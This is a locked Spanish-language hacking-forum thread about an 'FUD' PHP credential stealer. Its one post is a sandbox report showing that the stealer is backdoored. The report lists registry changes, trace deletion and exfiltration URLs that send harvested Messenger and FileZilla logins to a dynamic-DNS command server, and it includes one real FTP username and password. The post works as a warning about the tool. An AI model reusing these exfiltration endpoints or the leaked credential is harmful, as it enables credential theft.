Jump to content
YOUR-AD-HERE
HOSTING
TOOLS

Locked Anti-Av PHP Stealer [2013 FUD] Stabil!

Slwestr

By INACTIVE Slwestr
in Post Infected

 Share

Recommended Posts

TIFONS Leech

INACTIVE TIFONS

Posted
Posted (edited)

Re: Anti-Av PHP Stealer [2013 FUD] Stabil!

 

Como bien dice ЭдБытсс esta backdorizada.

 

reporte BSA:

[spoiler=REPORTE]

 

[ Changes to filesystem ]

* Modifies file C:\Users\XXXX\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat

* Deletes file C:\Users\XXXX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.tmp

 

[ Changes to registry ]

* Creates Registry key HKEY_LOCAL_MACHINE\software\classes\clsid\{0358B920-0AC7-461F-98F4-58E32CD89148}

* Creates Registry key HKEY_LOCAL_MACHINE\software\classes\clsid\{057EEE47-2572-4AA1-88D7-60CE2149E33C}

* Creates Registry key HKEY_LOCAL_MACHINE\software\classes\clsid\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}

* Creates Registry key HKEY_LOCAL_MACHINE\software\classes\clsid\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}

* Creates Registry key HKEY_LOCAL_MACHINE\software\microsoft\SQMClient\Windows\DisabledProcesses

* Creates Registry key HKEY_LOCAL_MACHINE\software\microsoft\SQMClient\Windows\DisabledSessions

* Creates Registry key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\PeerDist\Service

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1e9ea5f7-5fc9-11e1-b06c-000c292fcffb}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1e9ea634-5fc9-11e1-b06c-000c292fcffb}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{45cc1d6c-eca1-11e1-9547-806e6f6e6963}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{7c627537-5fd7-11e1-9cc6-000c292fcffb}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b0b98a20-5f41-11e1-b30b-806e6f6e6963}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b124dd89-6004-11e1-aaa9-000c292fcffb}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b3a9e94c-a932-11e2-b7b2-806e6f6e6963}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{ed3bffff-790f-11e1-a31b-000c292fcffb}

old value empty

* Empties value "CachePrefix" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content

old value "CachePrefix=0000"

* Modifies value "SavedLegacySettings=4600000069070000090000000000000000000000000000000400000000000000C39A58245EDBCD010000000000000000000000000200000002000000C0A801910000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001700000000000000200100005EF579FD3C6828963F57FE6E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections

old value "SavedLegacySettings=4600000068070000090000000000000000000000000000000400000000000000C39A58245EDBCD010000000000000000000000000200000002000000C0A801910000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001700000000000000200100009D38953C3018161B3F57FE6E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"

* Modifies value "DefaultConnectionSettings=4600000035600000090000000000000000000000000000000400000000000000C39A58245EDBCD010000000000000000000000000200000002000000C0A801910000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001700000000000000200100009D386AB8289D35BA3F57FE6E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections

old value "DefaultConnectionSettings=4600000034600000090000000000000000000000000000000400000000000000C39A58245EDBCD010000000000000000000000000200000002000000C0A801910000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001700000000000000200100005EF579FD3C6828963F57FE6E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"

* Creates value "TEST.exe=Slwestr" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\G:\DESCARGAS\EXCLUIDO AVS\AAStealer\Stealer

binary data=53006C00770065007300740072000000

 

[ Network services ]

* Looks for an Internet connection.

* Queries DNS "autoglut.servegame.com".

* G:\DESCARGAS\EXCLUIDO AVS\AAStealer\Stealer\TEST.exe Connects to "50.28.8.18" on port 80 (TCP - HTTP).

* Downloads file from "autoglut.servegame.com/check/index.php?action=add&username=Password&password=Password%20Strength&app=User%20Name&pcname=EDITADO-POR-MI&sitename=eb%20Browser".

* Downloads file from "autoglut.servegame.com/check/index.php?action=add&[email protected]&password=a%20hackear%20a%20tu%20puta%20madre&app=Messenger&pcname=XXXX&sitename=www.hotmail.com".

* Downloads file from "autoglut.servegame.com/check/index.php?action=add&[email protected]&password=a%20pelarla%20lammersillo%20jejeje&app=Messenger&pcname=XXXX&sitename=www.hotmail.com".

* Downloads file from "autoglut.servegame.com/check/index.php?action=add&username=u947071809&password=3nGZRuaEqL&app=Filezilla&pcname=XXXX&sitename=31.170.166.199".

* Opens next URLs:

This is the hidden content, please
Strength&app=User Name&pcname=XXXX&sitename=eb Browser--->> backdoor

This is the hidden content, please
hackear a tu puta madre&app=Messenger&pcname=XXXX&sitename=www.hotmail.com --->correcto lo que yo recibiria

This is the hidden content, please
hackear a tu puta madre&app=Messenger&pcname=XXXX&sitename=www.hotmail.com --->> backdoor

This is the hidden content, please
pelarla lammersillo jejeje&app=Messenger&pcname=XXXX&sitename=www.hotmail.com --->correcto lo que yo recibiria

This is the hidden content, please
pelarla lammersillo jejeje&app=Messenger&pcname=XXXX&sitename=www.hotmail.com --->> backdoor

This is the hidden content, please
--->correcto lo que yo recibiria

This is the hidden content, please
--->> backdoor

 

[ Process/window/string information ]

* Deletes activity traces.

* Sleeps 960 seconds.

pd , uso dos cuentas con pass falsa para testar , y una de filezila que era verdadera,aunque ya no la uso , es lo unico que edite aparte del nombre de mi pc del reporte.

 

 

 

 

como se ve conecta aparte de localhost al autor .

 

pd2: el foro me va muyyyyyyyyyy lento , postear esto me costo horrores,

 

Un saludo

Edited by TIFONS
Link to comment
Share on other sites
Guest
This topic is now closed to further replies.
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.